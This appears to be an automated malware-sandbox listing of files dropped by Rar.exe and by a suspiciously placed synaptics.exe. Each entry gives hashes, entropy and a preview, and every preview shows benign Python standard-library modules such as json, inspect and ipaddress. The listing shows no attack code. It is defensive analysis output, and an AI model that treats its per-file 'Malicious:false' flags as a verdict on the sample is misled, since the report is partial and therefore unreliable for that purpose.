                                                                                                                                                                                      Preview:"""Utility code for constructing importers, etc."""..from ._abc import Loader..from ._bootstrap import module_from_spec..from ._bootstrap import _resolve_name..from ._bootstrap import spec_from_loader..from ._bootstrap import _find_spec..from ._bootstrap_external import MAGIC_NUMBER..from ._bootstrap_external import _RAW_MAGIC_NUMBER..from ._bootstrap_external import cache_from_source..from ._bootstrap_external import decode_source..from ._bootstrap_external import source_from_cache..from ._bootstrap_external import spec_from_file_location....from contextlib import contextmanager..import _imp..import functools..import sys..import types..import warnings......def source_hash(source_bytes):.. "Return the hash of *source_bytes* as used in hash-based pyc files.".. return _imp.source_hash(_RAW_MAGIC_NUMBER, source_bytes)......def resolve_name(name, package):.. """Resolve a relative module name to an absolute one.""".. if not name.startswith('.'):.. return name.. elif no
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):127695
                                                                                                                                                                                      Entropy (8bit):4.505858957237594
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3072:TbCpSW3YOJ9jRCocEM8+8DAE8ikcLBbjxXgqS7GjQ4XpQrCp:TupSW399jIocEn+AA3iTbj2qIGjfXpCE
                                                                                                                                                                                      MD5:85AB7DDA08A01A01AF22D1D84EFF412A
                                                                                                                                                                                      SHA1:BDDF7F923E6D7FE75F91776B783EDDEAE6B890F9
                                                                                                                                                                                      SHA-256:A9340ED8296AA4C38DEF7E69A1236A866C2F1D85C59FD48D788CAC85BD095401
                                                                                                                                                                                      SHA-512:A23C4044EF631EC616CBDD4931B1FE15A4F868AF974624E83F13B0F897C42D42421B3C0E61FFCF93A6633626762FED8E4BEA6E56F2E5A3D34C9566BE3E38E6F4
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Get useful information from live Python objects.....This module encapsulates the interface provided by the internal special..attributes (co_*, im_*, tb_*, etc.) in a friendlier fashion...It also provides some help for examining source code and class layout.....Here are some of the useful functions provided by this module:.... ismodule(), isclass(), ismethod(), isfunction(), isgeneratorfunction(),.. isgenerator(), istraceback(), isframe(), iscode(), isbuiltin(),.. isroutine() - check object types.. getmembers() - get members of an object that satisfy a given condition.... getfile(), getsourcefile(), getsource() - find an object's source code.. getdoc(), getcomments() - get documentation on an object.. getmodule() - determine the module that an object came from.. getclasstree() - arrange classes so as to represent their hierarchy.... getargvalues(), getcallargs() - get info about function arguments.. getfullargspec() - same, with support for Pytho
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4310
                                                                                                                                                                                      Entropy (8bit):4.893348499094317
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:pKFiCaQLDyrpVfnmlaypyvRbfnI+ad3GpcmvItakagjUgXgBagO:dCJDo/U9yJL0d3GtojXQB9O
                                                                                                                                                                                      MD5:99710B1A7D4045B9334F8FC11B084A40
                                                                                                                                                                                      SHA1:7032FACDE0106F7657F25FB1A80C3292F84EC394
                                                                                                                                                                                      SHA-256:FE91B067FD544381FCD4F3DF53272C8C40885C1811AC2165FD6686623261BC5D
                                                                                                                                                                                      SHA-512:AC1B4562ED507BCCCC2BDFD8CAB6872A37C081BE4D5398BA1471D84498C322DCAA176EB1DDA23DAADDD4CEBFCD820B319DDCB33C3972EBF34B32393AD8BD0412
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""The io module provides the Python interfaces to stream handling. The..builtin open function is defined in this module.....At the top of the I/O hierarchy is the abstract base class IOBase. It..defines the basic interface to a stream. Note, however, that there is no..separation between reading and writing to streams; implementations are..allowed to raise an OSError if they do not support a given operation.....Extending IOBase is RawIOBase which deals simply with the reading and..writing of raw bytes to a stream. FileIO subclasses RawIOBase to provide..an interface to OS files.....BufferedIOBase deals with buffering on a raw byte stream (RawIOBase). Its..subclasses, BufferedWriter, BufferedReader, and BufferedRWPair buffer..streams that are readable, writable, and both respectively...BufferedRandom provides a buffered interface to random access..streams. BytesIO is a simple stream of in-memory bytes.....Another IOBase subclass, TextIOBase, deals with the encoding and decoding..of stre
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):77010
                                                                                                                                                                                      Entropy (8bit):4.541799790471141
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:gmOEpzoz5zCcf6ZQ8kSEtw1M1DGhkaCU7m7F7nKEwXN60wGUrnPpNBwB/FfhOQ3F:p3k92cfn8rB/3UrPStFnzkS4uJiajZ7
                                                                                                                                                                                      MD5:9BE18AFCDD961CC5E3D7595473D3278D
                                                                                                                                                                                      SHA1:7C4DF2C60B087E8F1EBF939DB830314102F55E12
                                                                                                                                                                                      SHA-256:B3B5B18B43472AEC15CE5F18350A2B3F7D1AFBF9D55B8AF865CD62495BCAD0D2
                                                                                                                                                                                      SHA-512:27BE7EE868858B1F69C71383C1CF3060034156E97BE86782EA37E884FF182FB1569CF5F082754B6E308299EBD67F958349E7066D8326EA50B5482636AE755DB9
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Copyright 2007 Google Inc...# Licensed to PSF under a Contributor Agreement....."""A fast, lightweight IPv4/IPv6 manipulation library in Python.....This library is used to create/poke/manipulate IPv4 and IPv6 addresses..and networks....."""....__version__ = '1.0'......import functools....IPV4LENGTH = 32..IPV6LENGTH = 128......class AddressValueError(ValueError):.. """A Value Error related to the address."""......class NetmaskValueError(ValueError):.. """A Value Error related to the netmask."""......def ip_address(address):.. """Take an IP string/int and return an object of the correct type..... Args:.. address: A string or integer, the IP address. Either IPv4 or.. IPv6 addresses may be supplied; integers less than 2**32 will.. be considered to be IPv4 by default..... Returns:.. An IPv4Address or IPv6Address object..... Raises:.. ValueError: if the *address* passed isn't either a v4 or a v6.. address.... """.. t
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):14379
                                                                                                                                                                                      Entropy (8bit):4.879440125735685
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:yi/B/vYM/qFHkKzxUrZGabjtH0kSzxUrZGabuZbN92JDRCRtqUmnXRCRtqWAi2K5:yOIzxGwzxFxnWECxECdA
                                                                                                                                                                                      MD5:DB4A220A79A5F826EF36359ED1C50C28
                                                                                                                                                                                      SHA1:1774DC6339A61957AA38AB6A6A25AB6A0B1D9DE4
                                                                                                                                                                                      SHA-256:FEB17670E443E5DB2723F217727DCC5D5E155C40E4E6935B16061C88542F24E7
                                                                                                                                                                                      SHA-512:3A51E599669D4AFC7339EF06C7A3C9889718EE525F019F044672F2A1C7DE6BF98F581AF54B138D0573D2CC9CF660DDBDF81DB9C4516A125F49BE4A147F2F09B6
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:r"""JSON (JavaScript Object Notation) <https://json.org> is a subset of..JavaScript syntax (ECMA-262 3rd edition) used as a lightweight data..interchange format.....:mod:`json` exposes an API familiar to users of the standard library..:mod:`marshal` and :mod:`pickle` modules. It is derived from a..version of the externally maintained simplejson library.....Encoding basic Python object hierarchies::.... >>> import json.. >>> json.dumps(['foo', {'bar': ('baz', None, 1.0, 2)}]).. '["foo", {"bar": ["baz", null, 1.0, 2]}]'.. >>> print(json.dumps("\"foo\bar")).. "\"foo\bar".. >>> print(json.dumps('\u1234')).. "\u1234".. >>> print(json.dumps('\\')).. "\\".. >>> print(json.dumps({"c": 0, "b": 0, "a": 0}, sort_keys=True)).. {"a": 0, "b": 0, "c": 0}.. >>> from io import StringIO.. >>> io = StringIO().. >>> json.dump(['streaming API'], io).. >>> io.getvalue().. '["streaming API"]'....Compact encoding::.... >>> import json.. >>> mydict = {'4':
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):12277
                                                                                                                                                                                      Entropy (8bit):5.384527163048202
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:gM0k25NKigD6B7+vx1GkRGqb9j4ytKv72vx1GkRGqb4MmQTQOQkQsx1LtbQkQsxz:gM0TNKigBvx99j4g3vxx47OZrXZrb/
                                                                                                                                                                                      MD5:F478A312375D5F5FB276A5AF4DBA7B89
                                                                                                                                                                                      SHA1:A5B9424ECA1B49B72F46C9DFBBE061DD40340EE6
                                                                                                                                                                                      SHA-256:63CBEA79B2CDEB9BDAA84285FF4C767B1B85201C488B227709781232530A8839
                                                                                                                                                                                      SHA-512:4FDABF830BC4720374299EC3A81E2BABB588106EB7412DED8F95F7B8067F8E533069F552BC6379A5F8A54A7426DFFE7A62AF10180938A45F73642ECBE73CA316
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d+8.......................@...s....d.Z.d.Z.g.d...Z.d.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.Z.e.d.d.d.d.d.d.d.d...Z.d.d.d.d.d.d.d.d.d.d...d.d...Z.d.d.d.d.d.d.d.d.d.d...d.d...Z.e.d.d.d...Z.d.d...Z.d.d.d.d.d.d.d...d.d...Z.d.d.d.d.d.d.d...d.d...Z.d.S.).a....JSON (JavaScript Object Notation) <https://json.org> is a subset of.JavaScript syntax (ECMA-262 3rd edition) used as a lightweight data.interchange format...:mod:`json` exposes an API familiar to users of the standard library.:mod:`marshal` and :mod:`pickle` modules. It is derived from a.version of the externally maintained simplejson library...Encoding basic Python object hierarchies::.. >>> import json. >>> json.dumps(['foo', {'bar': ('baz', None, 1.0, 2)}]). '["foo", {"bar": ["baz", null, 1.0, 2]}]'. >>> print(json.dumps("\"foo\bar")). "\"foo\bar". >>> print(json.dumps('\u1234')). "\u1234". >>> print(json.dumps('\\')). "\\". >>> print(json.dumps({"c": 0, "b": 0, "a": 0}, sort_keys=True)). {"
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):9779
                                                                                                                                                                                      Entropy (8bit):5.568031850536481
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:CEe7HwzdSfu7lO+V4F9euIL0t1gwaF8mbANHFThJt7AeIsk9uYE5:1sHwzdT8+w9elwt28muIt4YQ
                                                                                                                                                                                      MD5:C55B1FFAF9BD9B5BB4139294A07C4E83
                                                                                                                                                                                      SHA1:F821977F1727A34067621407BA4B3618CA054F30
                                                                                                                                                                                      SHA-256:EA0A7A8CB3A7EBD2E8F125AC1FDF60F566F39703C7B33E3DA102877657214862
                                                                                                                                                                                      SHA-512:61B0AE01958181D5ACD70D50C469C518CADD01258850D4C4477BCE04DB08EE6FCFF6E70FB0BE9981B892E6868FA1C5B68C57124B23EB1AFE3FB07E068AED83B7
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.2.......................@...s....d.Z.d.d.l.Z.d.d.l.m.Z...z.d.d.l.m.Z...W.n...e.y.......d.Z.Y.n.w.d.d.g.Z.e.j.e.j.B.e.j.B.Z.e.d...Z.e.d...Z.e.d...Z.G.d.d...d.e...Z.e.e.e.d...Z.e...d.e...Z.d.d.d.d.d.d.d.d.d...Z.d.d...Z.d.e.e.j.f.d.d...Z.e.phe.Z.e...d.e...Z.d.Z.d.e.j.e.f.d.d...Z.e.j.e.f.d.d ..Z.G.d!d...d.e...Z.d.S.)"z.Implementation of JSONDecoder......N)...scanner)...scanstring..JSONDecoder..JSONDecodeError..nan..infz.-infc....................@...s ...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.S.).r....a ...Subclass of ValueError with the following additional properties:.. msg: The unformatted error message. doc: The JSON document being parsed. pos: The start index of doc where parsing failed. lineno: The line corresponding to pos. colno: The column corresponding to pos.. c....................C...sb...|...d.d.|...d...}.|.|...d.d.|.....}.d.|.|.|.|.f...}.t...|.|.....|.|._.|.|._.|.|._.|.|._.|.|._.d.S.).N...r.........z.%s: line %d column %d (char %d))...count..rfind..ValueE
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):11130
                                                                                                                                                                                      Entropy (8bit):5.497589119893164
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:UqBrTkkgsft4MszI6lxnP14KAZX/WPxDvoLabuHyjnFibetRv4UO4FR0Q:dJDiMUnd4CPxDzbuS7FiTEd
                                                                                                                                                                                      MD5:2C235BEA71367C2D1F2812BFBDAC077E
                                                                                                                                                                                      SHA1:54E79586843297AAE65548A2BF6A9AC49EDBB78D
                                                                                                                                                                                      SHA-256:64461C1765AD11EE76886E171D2A038D89F5428485554C123AE3B23FB1F0A26F
                                                                                                                                                                                      SHA-512:99E226288AEE475FA8F027B8B8C14A6EA43D6CF111DE3DADFA72486125816DF2A8ED6299FADD1CC7C0D3634FF1D8B4DBADD7DD3CD0A66295255F88A7437CDACD
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.@.......................@...s6...d.Z.d.d.l.Z.z.d.d.l.m.Z...W.n...e.y.......d.Z.Y.n.w.z.d.d.l.m.Z...W.n...e.y-......d.Z.Y.n.w.z.d.d.l.m.Z...W.n...e.yA......d.Z.Y.n.w.e...d...Z.e...d...Z.e...d...Z.d.d.d.d.d.d.d.d...Z.e.d...D.].Z.e...e.e...d...e.......q_e.d...Z.d.d...Z.e.pxe.Z.d.d...Z.e.p.e.Z.G.d.d...d.e...Z.e.e.e.e.e.e.e.e e!e.j"f.d.d...Z#d.S.).z.Implementation of JSONEncoder......N)...encode_basestring_ascii)...encode_basestring)...make_encoderz.[\x00-\x1f\\"\b\f\n\r\t]z.([\\"]|[^\ -~])s....[.-.]z.\\z.\"z.\bz.\fz.\nz.\rz.\t)...\.."................ .....\u{0:04x}..infc....................C........d.d...}.d.t...|.|.....d...S.).z5Return a JSON representation of a Python string.. c....................S...s....t.|...d.....S.).Nr....)...ESCAPE_DCT..group)...match..r.....0C:\Users\Public\QExvbmVOb25l\lib\json\encoder.py..replace(...s......z%py_encode_basestring.<locals>.replacer....)...ESCAPE..sub....sr....r....r....r......py_encode_basestring$...s........r....c................
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1929
                                                                                                                                                                                      Entropy (8bit):5.6125424176839696
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:Uwhn/cfelN3xf9oI0rv3y1R0vSFkAVTdOIC54vD:j0MFLoPw5Td9CeD
                                                                                                                                                                                      MD5:B5AE1C592230A1627CACFD55ED8E3C1F
                                                                                                                                                                                      SHA1:401643B2E24CB492D282D23A5D17173978BACE31
                                                                                                                                                                                      SHA-256:2FC629042323C6EB09D29E055E1DC2330F5F83E2C1067D3B369C01A8D37F0954
                                                                                                                                                                                      SHA-512:8775BA0884AB7D79288CC28F2EC2A3779A53E51BF8835044E6E52C53476C4D7A6A43F69C937E4910ADEF5991760F2B3AC4046BD39C6CEC614492367E4C7CE16C
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...sh...d.Z.d.d.l.Z.z.d.d.l.m.Z...W.n...e.y.......d.Z.Y.n.w.d.g.Z.e...d.e.j.e.j.B.e.j.B...Z.d.d...Z.e.p1e.Z.d.S.).z.JSON token scanner......N)...make_scannerr....z)(-?(?:0|[1-9]\d*))(\.\d+)?([eE][-+]?\d+)?c........................sv...|.j...|.j...|.j...t.j...|.j...|.j...|.j...|.j...|.j...|.j...|.j...........................f.d.d.........f.d.d...}.|.S.).Nc........................s....z.|.|...}.W.n...t.y.......t.|...d...w.|.d.k.r...|.|.d.......S.|.d.k.r0..|.|.d...f.............S.|.d.k.r=..|.|.d...f.....S.|.d.k.rQ|.|.|.d.......d.k.rQd.|.d...f.S.|.d.k.re|.|.|.d.......d.k.red.|.d...f.S.|.d.k.ry|.|.|.d.......d.k.ryd.|.d...f.S...|.|...}.|.d.u.r.|.....\.}.}.}.|.s.|.r...|.|.p.d...|.p.d.....}.n...|...}.|.|.....f.S.|.d.k.r.|.|.|.d.......d.k.r...d...|.d...f.S.|.d.k.r.|.|.|.d.......d.k.r..d...|.d...f.S.|.d.k.r.|.|.|.d.......d.k.r..d...|.d...f.S.t.|.....).N..".......{..[..n.....Z.null..t..trueT..f.....Z.falseF....N.......NaN..I.......Infinity..-.....z.-Infinit
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):12829
                                                                                                                                                                                      Entropy (8bit):4.602150515729369
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:4LZ5A9dcw1No306qcRvU23OHh7MSUBzBru3Gc5kaXQxzfv4YAimanhXYAxisbPK:4Z5AZq30Nuv4WDK
                                                                                                                                                                                      MD5:5CCA52D21FDD03EBC838040B3B3448A0
                                                                                                                                                                                      SHA1:26EA25AB90B1D325AE65D492944E3757C0A1A4D6
                                                                                                                                                                                      SHA-256:B719FBCFCEBD2B174F076E71292E22B1A17D9E258DBE896C768325383BAD4F80
                                                                                                                                                                                      SHA-512:E21F1F5EF9821DC49A71552D8E3E42DB1D1817A9567C10AEA7764B3143630105570BCBF41A63AEE58B65ED7AC13C77AFC2A16CB46DC236F3529A95D755150D66
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Implementation of JSONDecoder.."""..import re....from json import scanner..try:.. from _json import scanstring as c_scanstring..except ImportError:.. c_scanstring = None....__all__ = ['JSONDecoder', 'JSONDecodeError']....FLAGS = re.VERBOSE | re.MULTILINE | re.DOTALL....NaN = float('nan')..PosInf = float('inf')..NegInf = float('-inf')......class JSONDecodeError(ValueError):.. """Subclass of ValueError with the following additional properties:.... msg: The unformatted error message.. doc: The JSON document being parsed.. pos: The start index of doc where parsing failed.. lineno: The line corresponding to pos.. colno: The column corresponding to pos.... """.. # Note that this exception is used from _json.. def __init__(self, msg, doc, pos):.. lineno = doc.count('\n', 0, pos) + 1.. colno = pos - doc.rfind('\n', 0, pos).. errmsg = '%s: line %d column %d (char %d)' % (msg, lineno, colno, pos).. ValueError.__init__(self, errmsg).
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):16516
                                                                                                                                                                                      Entropy (8bit):4.336988789550011
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:z8MkYik8K5R700myuumc/Wif3vwPQj+xSgy3vYJ54Ivj+xSvxCJ2sa:AY55R7JmyuumKf/pj+xSgy/8Nj+xSvQU
                                                                                                                                                                                      MD5:8385055D886BDB6D7BDE9306262D5771
                                                                                                                                                                                      SHA1:B468DB61686FCCD89829A048979922789E6C223F
                                                                                                                                                                                      SHA-256:E6F0DFDAA65847A24ED293EBC00D273A06862EE36C889C234D5AB3435D4BA364
                                                                                                                                                                                      SHA-512:6184DA762A0A43ECDDF5DEE142AEE374F86B2247C964FD5DF519CB6C82C398B5227315493DF134B14AF82EDC61ECE98FFC0D90CBCDC36278ED953AF4F04B6DBD
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Implementation of JSONEncoder.."""..import re....try:.. from _json import encode_basestring_ascii as c_encode_basestring_ascii..except ImportError:.. c_encode_basestring_ascii = None..try:.. from _json import encode_basestring as c_encode_basestring..except ImportError:.. c_encode_basestring = None..try:.. from _json import make_encoder as c_make_encoder..except ImportError:.. c_make_encoder = None....ESCAPE = re.compile(r'[\x00-\x1f\\"\b\f\n\r\t]')..ESCAPE_ASCII = re.compile(r'([\\"]|[^\ -~])')..HAS_UTF8 = re.compile(b'[\x80-\xff]')..ESCAPE_DCT = {.. '\\': '\\\\',.. '"': '\\"',.. '\b': '\\b',.. '\f': '\\f',.. '\n': '\\n',.. '\r': '\\r',.. '\t': '\\t',..}..for i in range(0x20):.. ESCAPE_DCT.setdefault(chr(i), '\\u{0:04x}'.format(i)).. #ESCAPE_DCT.setdefault(chr(i), '\\u%04x' % (i,))....INFINITY = float('inf')....def py_encode_basestring(s):.. """Return a JSON representation of a Python string.... """.. def replace(match):..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2498
                                                                                                                                                                                      Entropy (8bit):4.554490171873137
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:krFYUtdVRojq1j1op2sy5zRwDvAvsCYSl2SOsyV9P:krFJGjcjepJy5zRvkCYSl2SOsyV9P
                                                                                                                                                                                      MD5:83EDC258CA5D89378BC86FE790CBF1B7
                                                                                                                                                                                      SHA1:618A95730FC4AD64ADA9BA39F155B6A873D0447F
                                                                                                                                                                                      SHA-256:9841566FB17315EBDD40A1CA9CB214F02CDE7171B187D4DC821C80120EA853C3
                                                                                                                                                                                      SHA-512:932029300DB3D377BAA4B8003ACB2B76D7F757C02F067B035F4A248A8D2C1FF8E34CB7BBC4E332D354A3ACEF01A4905349F291F7E66774D1F557BA6126A0A225
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""JSON token scanner.."""..import re..try:.. from _json import make_scanner as c_make_scanner..except ImportError:.. c_make_scanner = None....__all__ = ['make_scanner']....NUMBER_RE = re.compile(.. r'(-?(?:0|[1-9]\d*))(\.\d+)?([eE][-+]?\d+)?',.. (re.VERBOSE | re.MULTILINE | re.DOTALL))....def py_make_scanner(context):.. parse_object = context.parse_object.. parse_array = context.parse_array.. parse_string = context.parse_string.. match_number = NUMBER_RE.match.. strict = context.strict.. parse_float = context.parse_float.. parse_int = context.parse_int.. parse_constant = context.parse_constant.. object_hook = context.object_hook.. object_pairs_hook = context.object_pairs_hook.. memo = context.memo.... def _scan_once(string, idx):.. try:.. nextchar = string[idx].. except IndexError:.. raise StopIteration(idx) from None.... if nextchar == '"':.. return parse_string(string, idx + 1, stri
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3424
                                                                                                                                                                                      Entropy (8bit):4.383060644777333
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:pPza+AFS0/LZ3DmLU9k+3W7P/BopadkHqdyf6yAp7zKaz:pP8Fp/F3EU9kV8adkHBf2Is
                                                                                                                                                                                      MD5:04BB41005A34A0439354779391919F36
                                                                                                                                                                                      SHA1:3878CE551869C7CD7A9801CC7E1533D758D73F7D
                                                                                                                                                                                      SHA-256:E4940A58DC30B05A4D66ABCE80C8FF52712BD9EAAAAF50B526ECCB49185950D6
                                                                                                                                                                                      SHA-512:E5ACA0CE7E46F86F678464E2C1AEEDD2B3BC86C98323B362FF02235DC69295001E0B6F7978754A0917AA4640808CB2656FFC64CCA179E88378AE85F2A0E34CD6
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:r"""Command-line tool to validate and pretty-print JSON....Usage::.... $ echo '{"json":"obj"}' | python -m json.tool.. {.. "json": "obj".. }.. $ echo '{ 1.2:3.4}' | python -m json.tool.. Expecting property name enclosed in double quotes: line 1 column 3 (char 2)...."""..import argparse..import json..import sys..from pathlib import Path......def main():.. prog = 'python -m json.tool'.. description = ('A simple command line interface for json module '.. 'to validate and pretty-print JSON objects.').. parser = argparse.ArgumentParser(prog=prog, description=description).. parser.add_argument('infile', nargs='?',.. type=argparse.FileType(encoding="utf-8"),.. help='a JSON file to be validated or pretty-printed',.. default=sys.stdin).. parser.add_argument('outfile', nargs='?',.. type=Path,.. help='write the output of infile t
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1124
                                                                                                                                                                                      Entropy (8bit):4.587431451247715
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:1TuAvF8VVC7Ln46q7a/cl6b93h0qkc7mKeWdItSw+9S7e5:1K88VVV8c0qqp7mKr
                                                                                                                                                                                      MD5:DC5106AABD333F8073FFBF67D63F1DEE
                                                                                                                                                                                      SHA1:E203519CCD77F8283E1EA9D069C6E8DE110E31D9
                                                                                                                                                                                      SHA-256:EBD724ED7E01CE97ECB3A6B296001FA4395BB48161658468855B43CFF0E6EEBB
                                                                                                                                                                                      SHA-512:A2817944D4D2FB9EDD2E577FB0D6B93337E1B3F98D31AD157557363146751C4B23174D69C35EE5D292845DEDCD5EF32EEAC52B877D96EB108C819415D5CF300E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Keywords (from "Grammar/python.gram")....This file is automatically generated; please don't muck it up!....To update the symbols in this file, 'cd' to the top directory of..the python source tree and run:.... PYTHONPATH=Tools/peg_generator python3 -m pegen.keywordgen \.. Grammar/python.gram \.. Grammar/Tokens \.. Lib/keyword.py....Alternatively, you can run 'make regen-keyword'..."""....__all__ = ["iskeyword", "issoftkeyword", "kwlist", "softkwlist"]....kwlist = [.. 'False',.. 'None',.. 'True',.. 'and',.. 'as',.. 'assert',.. 'async',.. 'await',.. 'break',.. 'class',.. 'continue',.. 'def',.. 'del',.. 'elif',.. 'else',.. 'except',.. 'finally',.. 'for',.. 'from',.. 'global',.. 'if',.. 'import',.. 'in',.. 'is',.. 'lambda',.. 'nonlocal',.. 'not',.. 'or',.. 'pass',.. 'raise',.. 'return',.. 'try',.. 'while',.. 'with',.. 'yield'..]....softkwlist = [.. '_',..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5872
                                                                                                                                                                                      Entropy (8bit):4.318351105582314
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:459KnwPrY0wNyGv0/lTqhlBI2hgOwTYjbnknCG/l2IhLySDQ/v5R4/yi:Q9KnBg9qh5wTinknCG/1VySDQ/v8/yi
                                                                                                                                                                                      MD5:E54F85B0CA944E38241E4E7322026758
                                                                                                                                                                                      SHA1:55F288E471BB0E2B426F69AAC6F22BCB7A71DADE
                                                                                                                                                                                      SHA-256:9ED3BA77F235C8FCC60D00BD6B9AA9495C717B59C8AC9EFB7C6FFDFE9B82B034
                                                                                                                                                                                      SHA-512:54E47DD813DFEBC5147296E32A445F3A10FB89C48140EB9F5276B7CE564F74DC3955722C340DDA26541495A5B8C658ED70BF74090AAD505654EBFCCFA1246E1F
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Cache lines from Python source files.....This is intended to read lines from modules imported -- hence if a filename..is not found, it will look down the module search path for a file by..that name..."""....import functools..import sys..import os..import tokenize....__all__ = ["getline", "clearcache", "checkcache", "lazycache"]......# The cache. Maps filenames to either a thunk which will provide source code,..# or a tuple (size, mtime, lines, fullname) once loaded...cache = {}......def clearcache():.. """Clear the cache entirely.""".. cache.clear()......def getline(filename, lineno, module_globals=None):.. """Get a line for a Python source file from the cache... Update the cache if it doesn't contain an entry for this file already.""".... lines = getlines(filename, module_globals).. if 1 <= lineno <= len(lines):.. return lines[lineno - 1].. return ''......def getlines(filename, module_globals=None):.. """Get the lines for a Python source file from the
